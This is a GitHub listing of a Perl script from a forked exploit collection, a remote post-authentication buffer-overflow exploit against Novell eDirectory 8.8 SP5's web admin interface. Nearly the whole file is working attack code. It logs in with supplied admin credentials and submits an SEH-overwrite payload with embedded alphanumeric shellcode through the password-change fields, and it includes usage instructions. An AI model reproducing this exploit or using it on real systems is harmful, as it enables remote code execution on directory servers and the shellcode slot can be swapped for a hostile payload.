forked from morxploit/Exploits
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Novell_eDirectory_8.8_SP5_0day.pl
86 lines (62 loc) · 1.99 KB
/
Novell_eDirectory_8.8_SP5_0day.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# Exploit Title: Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF Exploit (0day)
# Date: 06/01/2010
# Author: His0k4 & Simo36
# Version: 8.8 SP5
# Tested on: Windows xp sp3
# Code :
#!usr\bin\perl
use WWW::Mechanize;
use HTTP::Cookies;
use HTTP::Headers;
$target=$ARGV[0];
if(!$ARGV[0]){
print "[+] Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF (0day)\n";
print "[+] Exploit : His0k4 & Simo36\n";
print "Usage:perl $0 [target]\n";
print "Example : exploit.pl<http://exploit.pl> https://192.168.1.2:8030\n";
exit();
}
$login_url = "$target/_LOGIN_SERVER_";
$url = "$target/dhost/httpstk";
# calc shellcode
my $shellcode =
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJItiO9mSHi".
"YNjyzNYIRTetxtQKOqpsgcHUKIin24OsjKkL9r8tWYVqNZWdXUL9T5PQhid2".
"NbvqlmKH21MOLZyqT5PKXujXVuQM1NhMpuTUukYXunNmpy3MUnSPjrP8FTWi".
"n4wKTUKPjNnMxZb0MpGl2U2kxqzXFu2RSn8uLuMONjHekOYoSnxeCEvuWNpp".
"LbDpXQwJJoJtNQ1bONWT2pfYK64XCnLykBMOY5m5scooOMxq4UwmqNBY0Nb4".
"yEIirUQlkYMvhOXbLuNOrWJLpVVYou3toMlGwVhvnFnqSVIzCoygMyJKdroj".
"mOBXx6Xyinr4eZA";
my $junk = "\x41" x 468;
my $jmp = "\x75\x06\x41\x42";
my $seh = "Du0d"; #Univ ret
my $align = "\x61" x 3;
my $eax = "\x50\xC3";
my $data1 = "\x43" x 146;
my $data2 = "\x43" x 900;
my $payload = $junk.$jmp.$seh.$align.$eax.$data1.$shellcode.$data2;
########Change Admin info########
$username = "Admin.context";
$password = "passwd";
#########################################
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
#Login
print "[x] Sending User & pass...\n";
$res = $mechanize->request(HTTP::Request->new('GET', "$login_url"));
$mechanize->submit_form(
form_name => "authenticator",
fields => {
usr => $username,
pwd => $password},
button => 'Login');
#vuln occurring
print "[x] Sending Exploit...\n";
$res = $mechanize->get("$url");
print "[x] Exploit Sent!\n";
$mechanize->submit_form(
fields => {
sadminpwd => $payload,
verifypwd => $payload}
);